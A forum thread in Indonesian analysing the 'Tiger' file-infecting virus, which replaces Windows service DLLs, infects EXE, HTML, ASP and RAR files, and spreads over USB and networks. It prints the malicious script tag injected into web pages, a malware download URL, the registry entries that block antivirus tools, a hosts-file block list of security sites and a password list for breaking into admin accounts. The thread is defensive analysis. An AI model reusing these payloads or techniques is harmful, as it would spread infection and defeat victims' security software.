Ternyata virus ini marak beredar di RRC pada awal tahun 2010 yang sudah dekat dengan perayaan Imlek menyambut Tahun "Harimau". Atas dasar itulah virus ini dinamakan virus Tiger oleh mereka. Saya sendiri juga yakin asal virus ini memang berasal dari negara tersebut karena virus ini melakukan DNS Request ke www.baidu.com dan www.xunlei.com. Artikel-artikel yang membahas tentang virus ini belum ada yang berbahasa Inggris, yang ada hanyalah dalam bahasa Mandarin (pada saat saya mencoba search dari Google).
Inilah yang mendorong ane untuk menulis artikel ini dengan kemampuan pas-pasan..  :-[

Nama File Induk: Setup.exe dan booter.exe
MD5: 09A1CB7D2FE6A3A3A90CF82914BCD1B6
CRC32: C4717989
Size: 243 KB

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi69.jpg)

Bentuk sampel ini didapat dari file aplikasi (Exe) yang telah terinfeksi oleh virus ini yang mana Smadav belum mendeteksinya sebagai virus. Mungkin ini bisa jadi pertimbangan untuk penambahan database Smadav maupun Anti Virus lain selanjutnya.

Tetapi Smadav mendeteksi file hasil tularannya di Flash Disk (Setup.exe) yang terdeteksi sebagai QVod.A oleh Smadav:

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi35.jpg)

Lalu, apa istimewanya dari virus ini sehingga menarik untuk dibahas? Virus ini mengadopsi teknik Dewa Worm yaitu conficker dalam hal menyamar sebagai Service Windows dan menyebar melalui jaringan sehingga tidak terlihat prosesnya melalui Task Manager. Tetapi tidak seperti para pendahulunya (Virus Alman dan Conficker) yang menyamar sebagai Service yang baru, virus ini menyamar sebagai Service yang sama persis namanya dengan Service Windows yang sudah ada sehingga membuatnya sangat sulit untuk dilacak dan dibasmi.. (http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/17.gif)

Mirip dengan Ramnit dan Sality dalam hal menginfeksi file Exe, HTM, dan HTML ditambah lagi virus ini bisa menginfeksi file ASP, ASPX, dan file-file ASP, ASPX, Exe, HTM, dan HTML yang terkompres dalam bentuk RAR. Setahu saya, belum ada virus yang menginfeksi file di dalam bentuk RAR sebelum ini. Ditambah lagi virus ini bisa mengundang kumpulan virus lainnya melalui koneksi Internet. Teknik klasik juga dilakukannya seperti memblok beberapa Anti Virus Terkenal dan juga terhadap Website-website yang berhubungan dengan Security dan Anti Virus.. (http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/42.gif)

Walaupun sudah banyak Anti Virus yang bisa mendeteksi (http://www.virustotal.com/file-scan/report.html?id=7ecbd14459ca6924d2aaedb0b93edae0b123d9de35c77a288b9babe538c08edf-1325718304) Virus ini, namun kita tetap harus waspada karena teknik yang digunakannya bisa lebih dikembangkan dalam dunia pervirusan terutama tekniknya dalam menginfeksi file-file di dalam kompresan RAR.  8)

Sewaktu virus Setup.exe pada Flash Disk ini dijalankan pada komputer yang sehat, maka dia akan memonitor dan mencari Service Windows diantara berikut ini (secara berurutan dari atas ke bawah) yang masih dalam keadaan off:
Sorry but you are not allowed to view spoiler contents.
Target Service yang akan diinfeksi adalah Service yang masih dalam keadaan off untuk diinfeksi file Dll yang bersangkutan dengannya. Mengapa mengincar Service yang sedang off? Karena file dll pada Service yang sedang dalam keadaan ON akan selalu aktif di-load sehingga harus mematikan servicenya terlebih dahulu sebelum bisa diinfeksi file dll-nya. Semua Service ini dijalankan oleh svchost.exe (netsvcs).
Setelah menemukan target Service Windows yang akan diinfeksinya, Setup.exe mengganti (Overwrite, bukan menginfeksi) file dll yang bersangkutan dengan Service yang diincarnya (lokasinya di dalam C:\windows\system32).

File dll palsu dari virus ini selalu berukuran 243 KB
Sorry but you are not allowed to view spoiler contents.
Setelah membuat file dll palsu, virus ini akan segera memerintahkan Services.exe untuk menjalankan service ini melalui svchost.exe (netsvcs).
Sorry but you are not allowed to view spoiler contents.
Belajar dari virus Alman dan Conficker yang mudah di-kill dengan Services.msc, setup.exe akan mencegahnya dengan menghapus key berikut pada Registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[Nama Pendek]

Misalnya Service yang menjadi target adalah AppMgmt (Application Management), maka key yang dihapus adalah:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt

Tujuan menghapus key ini adalah agar korban tidak bisa menghentikan Service samaran dibuat oleh virus ini. Ketika korban mencoba melakukan klik ganda terhadap service ini melalui Run-->"Services.msc" (Tekan Enter), akan muncul pesan error:
Sorry but you are not allowed to view spoiler contents.
Setup.exe juga membuat file DelInfo.bin pada C: untuk menyimpan informasi tentang lokasi Drive dan File di dalam komputer korban. Sampai di sini, peran Setup.exe telah selesai (exit). Setelah itu, bisa dibilang Service palsu yang telah dipicunya inilah yang benar-benar menguasai komputer korban.

Aksi pertama yang dilakukan Service Dll palsu ini adalah membaca informasi pada C:\DelInfo.bin (kemudian menghapusnya) dan membuat Service tersembunyi baru lainnya yang bernama "Forter", dengan membuat file Forter.sys pada C:\WINDOWS\Temp dan Registry berikut ini:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter,
DisplayName = "Forter"
ErrorControl = 1
ImagePath = "\??\C:\WINDOWS\TEMP\Forter.sys"
Start = 3
Type = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Forter\Security,
Security = {Deretan Angka HeksaDesimal}

Pada Value "Start" bernilai 2 (Manual) yang artinya Service Forter ini akan berjalan jika dipicu baik itu oleh virus maupun User yang dalam hal ini tentunya dipicu oleh Virus (2=Manual dan 4=Disabled).
Kemudian, Service Dll yang palsu tadi akan memerintahkan Services.exe untuk segera memulai Service "Forter" yang telah dibuatnya tadi dan kemudian dijalankan oleh svchost.exe (netsvcs).

Sorry but you are not allowed to view spoiler contents.

Forter.sys ini sendiri sudah banyak dideteksi sebagai Rootkit (http://www.virustotal.com/file-scan/report.html?id=d41667602e2bb98e9be59593a2c7b41497dfd380701bfdab25f66d00af142f22-1326176674) yang dijalankan dengan tujuan (menurut saya) menyebar ke jaringan (seperti membobol akun Admininstrator komputer korban dan menyebarkannya lewat jaringan yang akan diberi penjelasan setelah ini). Setelah Service Foster ini selesai menjalankan tugasnya, maka Foster.sys beserta Key pada HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter ini akan segera dihapus untuk menghilangkan jejaknya. Jadi, sangat sulit melacak berjalannya Service ini bahkan dengan Run-->"Service.msc" sekalipun. Walaupun sulit untuk melacak berjalannya Service Forter ini, tetap saja akan meninggalkan jejak pada Key Registry (setiap Service yang pernah dijalankan akan meninggalkan jejak ini):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER,
NextInstance = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000,
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
ConfigFlags = 0
DeviceDesc = "Forter"
Legacy = 1
Service = "Forter"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000\Control,
ActiveService = Forter
*NewlyCreated* = 0

Sebagai catatan, varian virus Tiger pertama yang menyebar di RRC ini membuat file bernama Wowsub.sys pada C:\WINDOWS\TEMP  dan Service yang bernama "Wowsub", sedangkan varian yang saya dapatkan ini membuat file Forter.sys dan Service "Forter".

Sorry but you are not allowed to view spoiler contents.

Lalu Service Dll ini akan mulai menginfeksi file-file ASP, ASPX, HTM, HTML, dan RAR di dalam setiap Drive termasuk Flash Disk. Tetapi virus ini masih berbaik hati karena tidak menginjeksi file-file aplikasi yang ada di dalam folder:
Sorry but you are not allowed to view spoiler contents.
Pada file aplikasi (Exe) yang telah diinfeksi oleh virus ini, ternyata tidak mengalami pertambahan size (ukuran file) yang tetap.
Sorry but you are not allowed to view spoiler contents.
Apabila aplikasi yang telah diinfeksi ini dijalankan, maka aplikasi ini akan berjalan sebagaimana biasanya ditambah dia akan membuat file sementara booter.exe dan DelInfo.bin pada C: dan akan menjalankan file booter.exe yang telah dibuat ini. Setelah dijalankan, booter.exe dan DelInfo.bin kemudian akan dihapus kembali, begitulah seterusnya jika ada aplikasi yang telah diinfeksi berjalan. Jadi, jika ada aplikasi terinfeksi di komputer yang berjalan otomatis setiap komputer korban dinyalakan, maka komputer akan terinfeksi kembali. Booter.exe dan Setup.exe ini memiliki kode MD5 yang sama sehingga bisa dikatakan sama persis tingkah lakunya. Hanya saja, file setup.exe ini beratribut Hidden dan System sedangkan booter.exe tidak demikian. Begitu juga Booter.exe akan segera dihapus ketika selesai menjalankan perannya, sedangkan Setup.exe tidak demikian. Perbedaan ini dikarenakan Setup.exe mengincar komputer lain yang sehat sehingga harus Hidden agar tidak kelihatan dan tidak dihapus setelah menjalankan korbannya agar bisa semakin banyak menginfeksi korban.  ;)

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi43.jpg)

Selain booter.exe, file sementara di C: ini juga mungkin menggunakan nama CONFIG.exe dan boottemp.exe yang bisa dilihat dari String file setup.exe, booter.exe, file Dll palsu maupun file Exe yang terinfeksi:
Sorry but you are not allowed to view spoiler contents.
Ada beberapa file hasil infeksi yang masih bisa berjalan dan ada juga yang sama sekali tidak bisa berjalan dengan menampilkan pesan error sebagai berikut:
Sorry but you are not allowed to view spoiler contents.
Terkadang juga menimbulkan proses error bahwa sistem Windows sedang bermasalah karena aksi infeksi tersebut:
Sorry but you are not allowed to view spoiler contents.
Sementara ini banyak Anti Virus yang sudah mendeteksi (http://www.virustotal.com/file-scan/report.html?id=d06fee36900b52ddb16d74153d86e5e59549abb68d6ca7909994cef7d3003135-1326177797) file exe hasil infeksi ini sebagai virus. Tetapi belum banyak Anti Virus yang bisa menyembuhkan file Exe yang terinfeksi ini, kebanyakan langsung menghapusnya. Selain file aplikasi, virus ini juga menginfeksi file ASP, ASPX,  HTM, HTML dengan menambahkan script pada bagian footernya:
Kutip
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>
Sorry but you are not allowed to view spoiler contents.
Dengan tujuan ketika user menjalankan Script ASP, ASPX,  HTM, HTML yang dibukanya, maka komputer korban akan ternfeksi karena Script tersebut akan menjalankan javascript tongji.js (ketika terhubung dengan internet). Satu inovasi yang digunakan oleh virus ini adalah dia bisa menginfeksi file HTM, HTML, ASP, ASPX yang terkompres dalam bentuk rar (WinRAR archive). Untuk tujuan ini, virus menggunakan bantuan Rar.exe pada lokasi C:\Program Files\WinRAR untuk mengekstrak isi file rar target ke folder Temporary (C:\WINDOWS\TEMP) dengan Command berikut:
Kutip
"[Lokasi Rar.exe]" X -ibck "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\"

Selanjutnya akan menginfeksi file HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan menggunakan kembali Rar.exe untuk mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi dengan Command berikut:
Kutip
"[Lokasi Rar.exe]" M -ibck -r -o+ -ep1 "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\[Nama File RAR Target]\*"

Sorry but you are not allowed to view spoiler contents.
Selanjutnya akan menginfeksi file EXE, HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi.

Contoh: Jika virus ini mengincar Flash Defender.rar pada lokasi D:\Software, maka Commandnya akan berisi:
Kutip
"C:\Program Files\WinRAR\Rar.exe" X -ibck "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\"
Kutip
"C:\Program Files\WinRAR\Rar.exe" M -ibck -r -o+ -ep1 "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\Flash Fefender\*"

Sorry but you are not allowed to view spoiler contents.
Tetapi untuk file-file kompres yang ber-password tidak akan terinfeksi. Untuk itu, biasakan dari sekarang untuk membuat password pada file yang dikompres terutama yang didalamnya berisi file-file yang penting. Cukup menerapkan password yang sama untuk semuanya sehingga mudah diingat. Virus ini menyebar pada flash disk dengan membuat file setup.exe di dalam folder recycle.{645FF040-5081-101B-9F08-00AA002F954E} dan juga file autorun.inf yang isi tulisan di dalamnya adalah sebagai berikut:
Sorry but you are not allowed to view spoiler contents.

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi48.jpg)

Yang mana fungsi autorun.inf ini adalah agar setup.exe dapat berjalan otomatis jika user membuka Flash Disk tersebut.
Judul: Virus Tiger Penginfeksi File Asp, Aspx, Exe, Htm, Html, dan Rar
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 09:53:55 PM
Maaf dopost karena karakter berlebih..  ^:)^

Aksi Pada Registry

Untuk mempertahankan dirinya, maka virus ini akan memblok safe mode (akan keluar Blue Screen of Death sewaktu mencoba masuk safe mode) dengan menghapus ket berikut ini:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

Virus ini akan memblok beberapa Anti Virus luar dengan membuat key berikut ini
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Kode: [Pilih]
360hotfix.exe
360rp.exe
360rpt.exe
360safe.exe
360safebox.exe
360sd.exe
360se.exe
360SoftMgrSvc.exe
360speedld.exe
360tray.exe
ast.exe
avcenter.exe
avgnt.exe
avguard.exe
avmailc.exe
avp.exe
avwebgrd.exe
bdagent.exe
CCenter.exe
ccSvcHst.exe
egui.exe
ekrn.exe
kavstart.exe
kissvc.exe
kmailmon.exe
kpfw32.exe
kpfwsvc.exe
krnl360svc.exe
kswebshield.exe
KVMonXP.kxp
KVSrvXP.exe
kwatch.exe
livesrv.exe
Mcagent.exe
mcmscsvc.exe
McNASvc.exe
Mcods.exe
McProxy.exe
McSACore.exe
Mcshield.exe
mcsysmon.exe
mcvsshld.exe
MpfSrv.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
msksrver.exe
qutmserv.exe
RavMonD.exe
RavTask.exe
RsAgent.exe
rsnetsvr.exe
RsTray.exe
safeboxTray.exe
ScanFrm.exe
sched.exe
seccenter.exe
SfCtlCom.exe
TMBMSRV.exe
TmProxy.exe
UfSeAgnt.exe
vsserv.exe
zhudongfangyu.exe
修复工具.exe
Debugger = "ntsd -d"

Virus ini akan mengganti lokasi folder penampungan untuk Temporary Internet Files dengan mengubah value dari (untuk Win XP):
Sorry but you are not allowed to view spoiler contents.
Tujuan mengganti lokasi folder Temporary Internet Files ini mungkin agar file-file jahat di dalamnya dari hasil koneksi Internet sulit dilacak dan dihapus oleh korban.

Selain itu, virus ini juga mengganti lokasi folder penampungan informasi Favorites Toolbar pada Internet Explorer dari C:\Documents and Settings\[USER]\Favorites menjadi C:\Documents and Settings\NetworkService\Favorites dengan membuat folder baru bernama Favorites pada C:\Documents and Settings\NetworkService lengkap beserta file desktop.ini didalam folder ini yang isinya sama persis dengan yang asli.

Serta juga mengganti Value Favorites dari  "C:\Documents and Settings\[USER]\Favorites" menjadi  "C:\Documents and Settings\NetworkService\Favorites" dari kedua key berikut ini:
Sorry but you are not allowed to view spoiler contents.
Sorry but you are not allowed to view spoiler contents.

Catatan: Lokasi folder pada Windows XP dan Windows sedikit berbeda yang mengakibatkan Value Registry yang sdikit berbeda pula dengan rincian:

C:\Documents and Settings\[USER]\Local Settings\Temporary Internet Files (XP) = C:\Users\[USER]\AppData\Local\Microsoft\Windows\Temporary Internet Files (7)

C:\Documents and Settings\[USER]\Favorites (XP) = C:\windows\ServiceProfiles\NetworkService\Favorites (7)

C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files (XP) = C:\windows\ServiceProfiles\NetworkService\AppData\ Local\Temp\Temporary Internet Files (7)

Selanjutnya Registry berikut ini juga akan dihapus:
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
- HKEY_USERS\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXX-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX

Aksi Pada Jaringan

Melakukan blok ke website berikut dengan memodifikasi file C:\windows\drivers\etc\hosts:
Kode: [Pilih]
duba.net
rising.com.cn
360safe.com
eset.com.cn
jiangmin.com
antivir-pe.com
antivir-pe.de
symantecliveupdate.com
nai.com
micropoint.com.cn
kaspersky.com
kafan.cn
366tian.net
ikaka.com
vc52.cn
aikaba.com
janmeng.com
360.cn
bitdefender.com
symantec.com
sky.net.cn
norman.com
sunbelt-software.com.
ahn.com.cn
drweb.com.cn
free-av.com.avast.com

Untuk memastikan komputer korban terhubung dengan internet, virus ini melakukan aksi ping terhadap:
www.baidu.com
www.xunlei.com

Jika proses ping sukses (yang menandakan bahwa komputer korban terhubung dengan internet), selanjutnya virus ini akan mendownload sekumpulan Malware lainnya dari alamat yang telah ditentukan (http://208.53.151.219:8080/down/XXX.exe) di komputer korban.

Trafik DNS lainnya:
Kode: [Pilih]
a.nba1001.com
b.nba1001.com
c.nba1001.com
d.nba1001.com
e.nba1001.com
f.nba1001.com
g.nba1001.com
h.nba1001.com
i.nba1001.com
j.nba1001.com
up.nba1001.com
up1.nba1001.com
up2.nba1001.com
up3.nba1001.com
up4.nba1001.com
up5.nba1001.com
up6.nba1001.com
up7.nba1001.com
up9.nba1001.com
router.bitcomet.net
router.bitcomet.com
router.utorrent.com
UserTrust.com
ns6.staminus.net
www.co.sandai.net
www.3-0B6F-415d-B5C7-832F0.com

Selanjutnya mendownload sekumpulan Malware lainnya dari alamat yang telah ditentukan (http://208.53.151.219:8080/down/XXX.exe) di komputer korban.

Memerintahkan Internet Explorer untuk menampilkan halaman pop up: http://tj.nba1001.net:7777/tj/mac.html dengan Command Line:
"C:\Program Files\Internet Explorer\iexplore.exe" http://tj.nba1001.net:7777/tj/mac.html

Sorry but you are not allowed to view spoiler contents.

Virus ini juga menyebar melalui jaringan dan komputer lain (kemungkinan dilakukan dengan Service Forter) yang terhubung dengannya juga ikut terinfeksi. Untuk itu, Virus ini berusaha mengambil akun administrator komputer korban dengan kombinasi password:

Kode: [Pilih]
Administrator
Guest
admin
Root
password
6969
harley
123 456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123 456 789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
pass
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121 212
123 123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
xxx
god
xxxyou
xxx
abc
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100

Setelah berhasil membobol akun ADM komputer korban maka virus ini akan membuat replika CONFIG.exe (dengan MD5 yang persis sama dengan setup.exe maupun booter.exe) pada Direktori yang di-Share secara full dan mengirimkan perintah kepada komputer yang terhubung dengannya agar komputer sehat tersebut menjalankan CONFIG.exe ini sehingga komputer sehat ini bisa terinfeksi.

Kesimpulan:
- Virus menyamar sebagai Service Windows yang dilakukan dengan mengganti file Dll.
- Menginfeksi file ASP, ASPX, HTM, HTML, dan keempat file tersebut di dalam file RAR.
- Menyebar lewat Removable Disk dan jaringan.
- Menggunakan Rar.exe dan Iexplore.exe dalam melancarkan aksinya.

Metode Pembersihan:
Sorry but you are not allowed to view spoiler contents.
Sorry but you are not allowed to view spoiler contents.
http://herman-salim.blogspot.com/2012/01/virus-tiger-dari-cina.html
Judul: Re: Bedah Virus Disini !
Ditulis oleh: fajar234 pada Januari 11, 2012, 10:12:14 PM
bahaya sekali itu tiger. :O
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 10:17:28 PM
bahaya sekali itu tiger. :O
Yupss.. Bahaya sekali.. Untunglah penyebarannya tidak secepat conficker karena sudah banyak terdeteksi oleh AV Impor.. :)
Ane yang hanya Review saja pun takut bgt jika ane silap2 malah jalanin di komputer ane sendiri..

Mengingat virus ini sudah mulai masuk ke Indonesia, kita patut berhati-hati terutama masalah infeksi file RAR itu..

Mungkin bisa sesegera mungkin file exe yang terinfeksi itu dimasukkan ke dalam Database AV lokal di sini (http://smadaver.com/antivirus-lokal-lainnya).
Judul: Re: Bedah Virus Disini !
Ditulis oleh: 3ndiixz pada Januari 11, 2012, 10:40:33 PM
@ Ki@mhu : aq salut dg Mas,,, JOZZZ DAH  :-bd  :-bd  :-bd

uda membedah virus dg sebedah-bedahnya  :-X  :-X  :-X

+1  :-bd buat pyn,,,,
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 10:50:17 PM
@ Ki@mhu : aq salut dg Mas,,, JOZZZ DAH  :-bd  :-bd  :-bd

uda membedah virus dg sebedah-bedahnya  :-X  :-X  :-X

+1  :-bd buat pyn,,,,
Makasih gann.. :-bd

Ane banyak belajar dari artikel ini:
http://blog.sina.com.cn/s/blog_556f88ad0100hon3.html

Dibaca aja dengan google Translate karena ada beberapa dari hasil Review mereka yang ane gak ngerti jadi ane gak posting di sini..  :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: M. Ridzky pada Januari 11, 2012, 11:15:14 PM
(http://i41.servimg.com/u/f41/17/11/92/75/new_pi59.jpg)
:'( widiiihh nie virus kok namanya hampir sama kyk aplikasi qu sih,,,
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 11:22:43 PM
(http://i41.servimg.com/u/f41/17/11/92/75/new_pi59.jpg)
:'( widiiihh nie virus kok namanya hampir sama kyk aplikasi qu sih,,,
Iya yahh gann.. Ane juga baru nyadar..

Tapi sebenarnya file ini bukan virus gann.. Ini file yang sedang diinfeksi virus Tiger sewaktu ane ngambil SS-nya.. :)
File ini ada di FD ane tapi ane lupa darimana datangnya file ini.

Tadinya ane mao upload di sini filenya untuk agan bandingkan dengan buatan agan tapi baru teringat, file Rar ini sudah terinfeksi virus.. Jadi ane urungkan niat untuk upload..  :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: M. Ridzky pada Januari 11, 2012, 11:31:11 PM
(http://i41.servimg.com/u/f41/17/11/92/75/new_pi59.jpg)
:'( widiiihh nie virus kok namanya hampir sama kyk aplikasi qu sih,,,
Iya yahh gann.. Ane juga baru nyadar..

Tapi sebenarnya file ini bukan virus gann.. Ini file yang sedang diinfeksi virus Tiger sewaktu ane ngambil SS-nya.. :)
File ini ada di FD ane tapi ane lupa darimana datangnya file ini.

Tadinya ane mao upload di sini filenya untuk agan bandingkan dengan buatan agan tapi baru teringat, file Rar ini sudah terinfeksi virus.. Jadi ane urungkan niat untuk upload..  :)

Owh jadi itu file aplikasi lain yg udah terinfeksi gt ya, hmmm bahaya jg nih virus bikin rusak reputasi aplikasi ane aja :(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 11, 2012, 11:57:08 PM
Kutip
Owh jadi itu file aplikasi lain yg udah terinfeksi gt ya, hmmm bahaya jg nih virus bikin rusak reputasi aplikasi ane aja  :(

Maaf sebelumnya gann kalo postingan ini jadi mengarah ke produk agann.. Ane gak bermaksud seperti itu..  ^:)^
Tapi kalo mereka teliti, mereka tahu kok kalo ini bukan software agann.. Karena produk agan bernama Flashdisk Defender kalo yang di posttingan tadi Flash Defender. Logo software agan juga berbeda:

(http://smadaver.com/konsultasi-virus/mengatasi-virus-flyff-666-dll-vbs/?action=dlattach;attach=10389;image)

Nanti ane ganti deh dengan software lain yang namanya tidak mengarah ke software agann..  ;)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Januari 12, 2012, 03:55:02 AM
Sorry but you are not allowed to view spoiler contents.
Target Service yang akan diinfeksi adalah Service yang masih dalam keadaan off untuk diinfeksi file Dll yang bersangkutan dengannya. Mengapa mengincar Service yang sedang off? Karena file dll pada Service yang sedang dalam keadaan ON akan selalu aktif di-load sehingga harus mematikan servicenya terlebih dahulu sebelum bisa diinfeksi file dll-nya. Semua Service ini dijalankan oleh svchost.exe (netsvcs).
Setelah menemukan target Service Windows yang akan diinfeksinya, Setup.exe mengganti (Overwrite, bukan menginfeksi) file dll yang bersangkutan dengan Service yang diincarnya (lokasinya di dalam C:\windows\system32).

File dll palsu dari virus ini selalu berukuran 243 KB
Sorry but you are not allowed to view spoiler contents.
Setelah membuat file dll palsu, virus ini akan segera memerintahkan Services.exe untuk menjalankan service ini melalui svchost.exe (netsvcs).
Sorry but you are not allowed to view spoiler contents.
Belajar dari virus Alman dan Conficker yang mudah di-kill dengan Services.msc, setup.exe akan mencegahnya dengan menghapus key berikut pada Registry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\[Nama Pendek]

Misalnya Service yang menjadi target adalah AppMgmt (Application Management), maka key yang dihapus adalah:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt

Tujuan menghapus key ini adalah agar korban tidak bisa menghentikan Service samaran dibuat oleh virus ini. Ketika korban mencoba melakukan klik ganda terhadap service ini melalui Run-->"Services.msc" (Tekan Enter), akan muncul pesan error:
Sorry but you are not allowed to view spoiler contents.
Setup.exe juga membuat file DelInfo.bin pada C: untuk menyimpan informasi tentang lokasi Drive dan File di dalam komputer korban. Sampai di sini, peran Setup.exe telah selesai (exit). Setelah itu, bisa dibilang Service palsu yang telah dipicunya inilah yang benar-benar menguasai komputer korban.

Aksi pertama yang dilakukan Service Dll palsu ini adalah membaca informasi pada C:\DelInfo.bin (kemudian menghapusnya) dan membuat Service tersembunyi baru lainnya yang bernama "Forter", dengan membuat file Forter.sys pada C:\WINDOWS\Temp dan Registry berikut ini:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter,
DisplayName = "Forter"
ErrorControl = 1
ImagePath = "\??\C:\WINDOWS\TEMP\Forter.sys"
Start = 3
Type = 1

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Forter\Security,
Security = {Deretan Angka HeksaDesimal}

Pada Value "Start" bernilai 2 (Manual) yang artinya Service Forter ini akan berjalan jika dipicu baik itu oleh virus maupun User yang dalam hal ini tentunya dipicu oleh Virus (2=Manual dan 4=Disabled).
Kemudian, Service Dll yang palsu tadi akan memerintahkan Services.exe untuk segera memulai Service "Forter" yang telah dibuatnya tadi dan kemudian dijalankan oleh svchost.exe (netsvcs).

Sorry but you are not allowed to view spoiler contents.

Forter.sys ini sendiri sudah banyak dideteksi sebagai Rootkit (http://www.virustotal.com/file-scan/report.html?id=d41667602e2bb98e9be59593a2c7b41497dfd380701bfdab25f66d00af142f22-1326176674) yang dijalankan dengan tujuan (menurut saya) menyebar ke jaringan (seperti membobol akun Admininstrator komputer korban dan menyebarkannya lewat jaringan yang akan diberi penjelasan setelah ini). Setelah Service Foster ini selesai menjalankan tugasnya, maka Foster.sys beserta Key pada HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Forter ini akan segera dihapus untuk menghilangkan jejaknya. Jadi, sangat sulit melacak berjalannya Service ini bahkan dengan Run-->"Service.msc" sekalipun. Walaupun sulit untuk melacak berjalannya Service Forter ini, tetap saja akan meninggalkan jejak pada Key Registry (setiap Service yang pernah dijalankan akan meninggalkan jejak ini):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER,
NextInstance = 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000,
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
ConfigFlags = 0
DeviceDesc = "Forter"
Legacy = 1
Service = "Forter"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FORTER\0000\Control,
ActiveService = Forter
*NewlyCreated* = 0

Lalu Service Dll ini akan mulai menginfeksi file-file ASP, ASPX, HTM, HTML, dan RAR di dalam setiap Drive termasuk Flash Disk. Tetapi virus ini masih berbaik hati karena tidak menginjeksi file-file aplikasi yang ada di dalam folder:
Sorry but you are not allowed to view spoiler contents.
Pada file aplikasi (Exe) yang telah diinfeksi oleh virus ini, ternyata tidak mengalami pertambahan size (ukuran file) yang tetap.
Sorry but you are not allowed to view spoiler contents.
Apabila aplikasi yang telah diinfeksi ini dijalankan, maka aplikasi ini akan berjalan sebagaimana biasanya ditambah dia akan membuat file sementara booter.exe dan DelInfo.bin pada C: dan akan menjalankan file booter.exe yang telah dibuat ini. Setelah dijalankan, booter.exe dan DelInfo.bin kemudian akan dihapus kembali, begitulah seterusnya jika ada aplikasi yang telah diinfeksi berjalan. Jadi, jika ada aplikasi terinfeksi di komputer yang berjalan otomatis setiap komputer korban dinyalakan, maka komputer akan terinfeksi kembali. Booter.exe dan Setup.exe ini memiliki kode MD5 yang sama sehingga bisa dikatakan sama persis tingkah lakunya. Hanya saja, file setup.exe ini beratribut Hidden dan System sedangkan booter.exe tidak demikian. Begitu juga Booter.exe akan segera dihapus ketika selesai menjalankan perannya, sedangkan Setup.exe tidak demikian. Perbedaan ini dikarenakan Setup.exe mengincar komputer lain yang sehat sehingga harus Hidden agar tidak kelihatan dan tidak dihapus setelah menjalankan korbannya agar bisa semakin banyak menginfeksi korban.  ;)

